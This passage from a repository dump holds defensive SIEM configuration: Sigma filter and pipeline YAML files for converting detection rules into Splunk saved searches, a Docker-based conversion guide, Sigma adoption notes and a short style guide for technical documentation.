CurrentDirectory=".*?"', '' 113 | $_ = $_ -replace ' CurrentDirectory=".*?"', '' 114 | $_ = $_ -replace '^\[(.*?)\]$', '[$1 4688]' 115 | 116 | # Return the modified line 117 | $_ 118 | } | Set-Content $outputFile 119 | 120 | } 121 | 122 | end{ 123 | 124 | $elapsed = $stopwatch.Elapsed 125 | 126 | Write-Information -InformationAction Continue -MessageData ("Total time elapsed: {0}" -f $elapsed) 127 | Write-Information -InformationAction Continue -MessageData ("Ended at {0}" -f ((Get-Date).ToUniversalTime()).ToString("yyyy-MM-dd HH:mm:ssZ")) 128 | } 129 | } -------------------------------------------------------------------------------- /sigma/adoption.md: -------------------------------------------------------------------------------- 1 | Download sigma-master 2 | - https://github.com/SigmaHQ/sigma/ 3 | 4 | Use a script to create a csv of all the yml files 5 | - https://github.com/TonyPhipps/Powershell/blob/master/Get-FlatYAML.ps1 6 | 7 | Import into PowerBI, helping you slice the data 8 | - https://app.powerbi.com/ 9 | - Determine which category/product/services you are actually collecting, then apply those filters 10 | 11 | Optionally, import MITRE Framework 12 | - https://attack.mitre.org/resources/attack-data-and-tools/ 13 | - Determine which groups/techniques you care about, and apply an appropriate filter. 14 | 15 | -------------------------------------------------------------------------------- /sigma/filters/test_filter1.yml: -------------------------------------------------------------------------------- 1 | title: "yourindex-* Rules" 2 | description: "Rules that will go to yourindex-* but not yourindex-c" 3 | logsource: 4 | category: process_creation 5 | product: windows 6 | filter: 7 | rules: 8 | - ec570e53-4c76-45a9-804d-dc3f355ff7a7 # 7Zip Compressing Dump Files 9 | include: 10 | index: "yourindex-*" 11 | exclude: 12 | index: "yourindex-c" 13 | condition: include and not exclude -------------------------------------------------------------------------------- /sigma/filters/test_filter2.yml: -------------------------------------------------------------------------------- 1 | title: "yourstuff-b Rules Exlcuded" 2 | description: "Rules that NOT apply to yourstuff-b" 3 | logsource: 4 | product: windows 5 | filter: 6 | rules: 7 | - ec570e53-4c76-45a9-804d-dc3f355ff7a7 # 7Zip Compressing Dump Files 8 | exclude: 9 | index: "yourstuff-b" 10 | condition: exclude -------------------------------------------------------------------------------- /sigma/pipelines/cloudtrail.yml: -------------------------------------------------------------------------------- 1 | name: Splunk Alert stanza Postprocessing 2 | priority: 20 3 | postprocessing: 4 | - type: template 5 | template: |+ 6 | [{{ rule.title }}] 7 | description = {{ rule.description | replace('\n', ' ') }} 8 | search = index=cloudtrail _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | fields - _raw | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}" 9 | rule_conditions: 10 | - type: logsource 11 | product: aws 12 | service: cloudtrail 13 | 14 | 15 | finalizers: 16 | - type: template 17 | template: | 18 | [default] 19 | cron_schedule = */30 * * * * 20 | dispatch.earliest_time = 0 21 | dispatch.latest_time = now 22 | enableSched = 0 23 | schedule_window = auto 24 | {{ queries | join('\n') }} 25 | -------------------------------------------------------------------------------- /sigma/pipelines/linux_builtin.yml: -------------------------------------------------------------------------------- 1 | name: Splunk Alert stanza Postprocessing 2 | priority: 20 3 | postprocessing: 4 | - type: template 5 | template: |+ 6 | [{{ rule.title }}] 7 | description = {{ rule.description | replace('\n', ' ') }} 8 | search = index=syslog _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}" 9 | rule_conditions: 10 | - type: logsource 11 | product: linux 12 | 13 | 14 | finalizers: 15 | - type: template 16 | template: | 17 | [default] 18 | cron_schedule = */30 * * * * 19 | dispatch.earliest_time = 0 20 | dispatch.latest_time = now 21 | enableSched = 0 22 | schedule_window = auto 23 | {{ queries | join('\n') }} 24 | -------------------------------------------------------------------------------- /sigma/pipelines/webserver_generic.yml: -------------------------------------------------------------------------------- 1 | name: Splunk Alert stanza Postprocessing 2 | priority: 20 3 | postprocessing: 4 | - type: template 5 | template: |+ 6 | [{{ rule.title }}] 7 | description = {{ rule.description | replace('\n', ' ') }} 8 | search = index=syslog _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}" 9 | rule_conditions: 10 | - type: logsource 11 | category: webserver 12 | 13 | 14 | finalizers: 15 | - type: template 16 | template: | 17 | [default] 18 | cron_schedule = */30 * * * * 19 | dispatch.earliest_time = 0 20 | dispatch.latest_time = now 21 | enableSched = 0 22 | schedule_window = auto 23 | {{ queries | join('\n') }} 24 | -------------------------------------------------------------------------------- /sigma/pipelines/windows.yml: -------------------------------------------------------------------------------- 1 | name: Splunk Alert stanza Windows 2 | priority: 20 3 | postprocessing: 4 | - type: template 5 | template: |+ 6 | [{{ rule.title }}] 7 | description = {{ rule.description | replace('\n', ' ') }} 8 | search = index=evtx _index_earliest=-1h@h {{ query | replace('\n', '\\\n')}} | fields - _raw | collect index=notable_events source="{{ rule.title }}" marker="guid={{ rule.id }},{% for t in rule.tags %}tags={{ t }},{% endfor %}" 9 | rule_conditions: 10 | - type: logsource 11 | product: windows 12 | 13 | finalizers: 14 | - type: template 15 | template: | 16 | [default] 17 | cron_schedule = */30 * * * * 18 | dispatch.earliest_time = 0 19 | dispatch.latest_time = now 20 | enableSched = 0 21 | schedule_window = auto 22 | {{ queries | join('\n') }} 23 | -------------------------------------------------------------------------------- /sigma/pipelines/windows_sysmon.yml: -------------------------------------------------------------------------------- 1 | name: Windows Sysmon Transforms 2 | priority: 10 3 | - id: condition_sysmon_channel 4 | type: add_condition 5 | conditions: 6 | Channel: "Microsoft-Windows-Sysmon/Operational" 7 | rule_conditions: 8 | - type: logsource 9 | product: windows 10 | service: sysmon 11 | 12 | - id: condition_windows_process_creation 13 | type: add_condition 14 | conditions: 15 | Channel: "Microsoft-Windows-Sysmon/Operational" 16 | EventID: 1 17 | rule_conditions: 18 | - type: logsource 19 | product: windows 20 | category: process_creation 21 | 22 | - id: condition_windows_create_remote_thread 23 | type: add_condition 24 | conditions: 25 | Channel: "Microsoft-Windows-Sysmon/Operational" 26 | EventID: 8 27 | rule_conditions: 28 | - type: logsource 29 | product: windows 30 | category: create_remote_thread 31 | 32 | - id: condition_windows_create_stream_hash 33 | type: add_condition 34 | conditions: 35 | Channel: "Microsoft-Windows-Sysmon/Operational" 36 | EventID: 15 37 | rule_conditions: 38 | - type: logsource 39 | product: windows 40 | category: create_stream_hash 41 | 42 | - id: condition_windows_dns_query 43 | type: add_condition 44 | conditions: 45 | Channel: "Microsoft-Windows-Sysmon/Operational" 46 | EventID: 22 47 | rule_conditions: 48 | - type: logsource 49 | product: windows 50 | category: dns_query 51 | 52 | - id: condition_windows_driver_load 53 | type: add_condition 54 | conditions: 55 | Channel: "Microsoft-Windows-Sysmon/Operational" 56 | EventID: 6 57 | rule_conditions: 58 | - type: logsource 59 | product: windows 60 | category: driver_load 61 | 62 | - id: condition_windows_file_event 63 | type: add_condition 64 | conditions: 65 | Channel: "Microsoft-Windows-Sysmon/Operational" 66 | EventID: 11 67 | rule_conditions: 68 | - type: logsource 69 | product: windows 70 | category: file_event 71 | 72 | - id: condition_windows_file_delete 73 | type: add_condition 74 | conditions: 75 | Channel: "Microsoft-Windows-Sysmon/Operational" 76 | EventID: 77 | - 23 78 | - 26 79 | rule_conditions: 80 | - type: logsource 81 | product: windows 82 | category: file_delete 83 | 84 | - id: condition_windows_image_load 85 | type: add_condition 86 | conditions: 87 | Channel: "Microsoft-Windows-Sysmon/Operational" 88 | EventID: 7 89 | rule_conditions: 90 | - type: logsource 91 | product: windows 92 | category: image_load 93 | 94 | - id: condition_windows_network_connection 95 | type: add_condition 96 | conditions: 97 | Channel: "Microsoft-Windows-Sysmon/Operational" 98 | EventID: 3 99 | rule_conditions: 100 | - type: logsource 101 | product: windows 102 | category: network_connection 103 | 104 | - id: condition_windows_pipe_created 105 | type: add_condition 106 | conditions: 107 | Channel: "Microsoft-Windows-Sysmon/Operational" 108 | EventID: 17 109 | rule_conditions: 110 | - type: logsource 111 | product: windows 112 | category: pipe_created 113 | 114 | - id: condition_windows_process_access 115 | type: add_condition 116 | conditions: 117 | Channel: "Microsoft-Windows-Sysmon/Operational" 118 | EventID: 10 119 | rule_conditions: 120 | - type: logsource 121 | product: windows 122 | category: process_access 123 | 124 | - id: condition_windows_process_tampering 125 | type: add_condition 126 | conditions: 127 | Channel: "Microsoft-Windows-Sysmon/Operational" 128 | EventID: 25 129 | rule_conditions: 130 | - type: logsource 131 | product: windows 132 | category: process_tampering 133 | 134 | - id: condition_windows_raw_access_thread 135 | type: add_condition 136 | conditions: 137 | Channel: "Microsoft-Windows-Sysmon/Operational" 138 | EventID: 9 139 | rule_conditions: 140 | - type: logsource 141 | product: windows 142 | category: raw_access_thread 143 | 144 | - id: condition_windows_registry_add 145 | type: add_condition 146 | conditions: 147 | Channel: "Microsoft-Windows-Sysmon/Operational" 148 | EventID: 12 149 | rule_conditions: 150 | - type: logsource 151 | product: windows 152 | category: registry_add 153 | 154 | - id: condition_windows_registry_delete 155 | type: add_condition 156 | conditions: 157 | Channel: "Microsoft-Windows-Sysmon/Operational" 158 | EventID: 12 159 | rule_conditions: 160 | - type: logsource 161 | product: windows 162 | category: registry_delete 163 | 164 | - id: condition_windows_registry_event 165 | type: add_condition 166 | conditions: 167 | Channel: "Microsoft-Windows-Sysmon/Operational" 168 | EventID: 169 | - 12 170 | - 13 171 | rule_conditions: 172 | - type: logsource 173 | product: windows 174 | category: registry_event 175 | 176 | - id: condition_windows_registry_set 177 | type: add_condition 178 | conditions: 179 | Channel: "Microsoft-Windows-Sysmon/Operational" 180 | EventID: 13 181 | rule_conditions: 182 | - type: logsource 183 | product: windows 184 | category: registry_set 185 | 186 | - id: condition_windows_wmi_event 187 | type: add_condition 188 | conditions: 189 | Channel: "Microsoft-Windows-Sysmon/Operational" 190 | EventID: 191 | - 19 192 | - 20 193 | - 21 194 | rule_conditions: 195 | - type: logsource 196 | product: windows 197 | category: wmi_event 198 | 199 | - id: Windows Placeholders Management 200 | type: query_expression_placeholders 201 | include: 202 | - "domain_admin" 203 | - "Administrator" 204 | expression: "`placeholder_{id}({field})`" 205 | rule_conditions: 206 | - type: logsource 207 | product: windows 208 | 209 | -------------------------------------------------------------------------------- /sigma/pipelines/windows_xml.yml: -------------------------------------------------------------------------------- 1 | name: Windows Transforms 2 | priority: 10 3 | transformations: 4 | - id: field_mapping_windows 5 | type: field_name_mapping 6 | mapping: 7 | Provider_Name: "etw_provider" 8 | rule_conditions: 9 | - type: logsource 10 | product: windows 11 | 12 | - id: condition_system_channel 13 | type: add_condition 14 | conditions: 15 | Channel: System 16 | rule_conditions: 17 | - type: logsource 18 | product: windows 19 | service: system 20 | 21 | - id: condition_security_channel 22 | type: add_condition 23 | conditions: 24 | Channel: Security 25 | rule_conditions: 26 | - type: logsource 27 | product: windows 28 | service: security 29 | 30 | - id: condition_psclassic 31 | type: add_condition 32 | conditions: 33 | Channel: "Windows PowerShell" 34 | rule_conditions: 35 | - type: logsource 36 | product: windows 37 | category: ps_classic_provider_start 38 | 39 | - id: condition_psclassic2 40 | type: add_condition 41 | conditions: 42 | Channel: "Windows PowerShell" 43 | rule_conditions: 44 | - type: logsource 45 | product: windows 46 | category: ps_classic_start 47 | 48 | - id: condition_psclassic3 49 | type: add_condition 50 | conditions: 51 | Channel: "Windows PowerShell" 52 | rule_conditions: 53 | - type: logsource 54 | product: windows 55 | service: powershell-classic 56 | 57 | - id: condition_ps_module 58 | type: add_condition 59 | conditions: 60 | Channel: "Microsoft-Windows-PowerShell/Operational" 61 | EventID: 4103 62 | rule_conditions: 63 | - type: logsource 64 | product: windows 65 | category: ps_module 66 | 67 | - id: condition_ps_sbl 68 | type: add_condition 69 | conditions: 70 | Channel: "Microsoft-Windows-PowerShell/Operational" 71 | EventID: 4104 72 | rule_conditions: 73 | - type: logsource 74 | product: windows 75 | category: ps_script -------------------------------------------------------------------------------- /sigma/sigma-splunk-library.md: -------------------------------------------------------------------------------- 1 | # Create a Splunk savedsearches.conf Comprised of the Latest Sigma Rules 2 | 3 | Create this Dockerfile 4 | ``` 5 | FROM debian:bookworm 6 | 7 | RUN apt update 8 | RUN apt install -y python3 python3-pip pipenv git 9 | RUN pipenv install sigma-cli 10 | RUN pipenv run sigma plugin install splunk 11 | ``` 12 | 13 | Open a prompt 14 | (get or build pipelines) 15 | ``` 16 | mkdir sigma-cli 17 | cd sigma-cli 18 | mkdir pipelines #then copy/paste pipelines here 19 | mkdir output 20 | git clone https://github.com/SigmaHQ/sigma 21 | sudo docker build -t sigma-cli ./ 22 | sudo docker run -it --name sigma-cli --rm -v ./output:/mnt/output -v ./sigma/rules/:/mnt/rules -v ./pipelines:/mnt/pipelines sigma-cli:latest pipenv run sigma convert -t splunk -p /mnt/pipelines/evtx2splunk.yml /mnt/rules/windows/ -s -o /mnt/output/savedsearches.conf 23 | ``` 24 | 25 | Copy/paste the ```./output/savedsearches.conf``` file into ```/opt/splunk/etc/apps/YourApp/local/``` -------------------------------------------------------------------------------- /technical-documentation.md: -------------------------------------------------------------------------------- 1 | General guidance for writing technical documentation (procedures, especially). 2 | 3 | - Use "Navigate to **X** > **Y** > **Z**" to describe going through a menu system. Bold each level of navigation. 4 | - Use "Select **X**" to describe a menu dropdown. Bold the selection name. 5 | - Use "Click the **X** Button" to describe clicking buttons. Bold the button text. 6 | - Use "Click the **X** Radio Button" to describe selecting radio buttons. Bold the selected radio button text. 7 | - Use "In **X** Type _Y_" for supplying text to a text field. Bold the text field name, _italicize_ the text to be provided. 8 | - Use "Check **X**" to describe adding a checkmark. Bold the checkmark text. 9 | - Avoid numbering images and steps, if possible. These are only needed if heavy back/forward references are needed. 10 | - Avoid overuse of images/screenshots. They should only be used to clarify situations/steps that are inherently more difficult and an image provides clarity for. 11 | --------------------------------------------------------------------------------